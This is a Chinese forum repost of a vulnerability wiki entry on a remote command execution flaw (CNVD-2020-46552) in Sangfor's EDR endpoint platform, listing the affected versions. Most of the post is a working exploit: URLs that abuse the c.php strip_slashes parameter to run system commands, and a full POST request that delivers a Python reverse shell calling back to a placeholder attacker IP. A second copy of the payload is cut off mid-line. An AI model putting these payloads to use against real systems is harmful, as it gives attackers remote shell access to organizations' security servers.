发新话题
打印

深信服EDR远程命令执行 CNVD-2020-46552

深信服EDR远程命令执行 CNVD-2020-46552

漏洞描述深信服终端检测响应平台是深信服公司开发的一套EDR系统。攻击者利用该漏洞,可向目标服务器发送恶意构造的HTTP请求,从而获得目标服务器的权限,实现远程代码控制执行。
影响版本

Note

EDR v3.2.16
EDR v3.2.17
EDR v3.2.19

漏洞复现https://xxx.xxx.xxx.xxx/tool/log/c.php?strip_slashes=system&limit=whoamihttps://xxx.xxx.xxx.xxx/tool/log/c.php?strip_slashes=system&host=whoamihttps://xxx.xxx.xxx.xxx/tool/log/c.php?strip_slashes=system&path=whoamihttps://xxx.xxx.xxx.xxx/tool/log/c.php?strip_slashes=system&row=whoami


反弹shellPOST /tool/log/c.php HTTP/1.1Host: x.x.x.xUpgrade-Insecure-Requests: 1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Content-Type: application/x-www-form-urlencoded;charset=utf-8Accept-Language: zh-CN,zh;q=0.9Content-Length: 256
strip_slashes=system&host=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxx.xxx.xxx.xxx",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

向 /tool/log/c.php POST以下数据即可
strip_slashes=system&host=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOC原文: http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D/%E6%B7%B1%E4%BF%A1%E6%9C%8DEDR%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%20CNVD-2020-46552.html

TOP

发新话题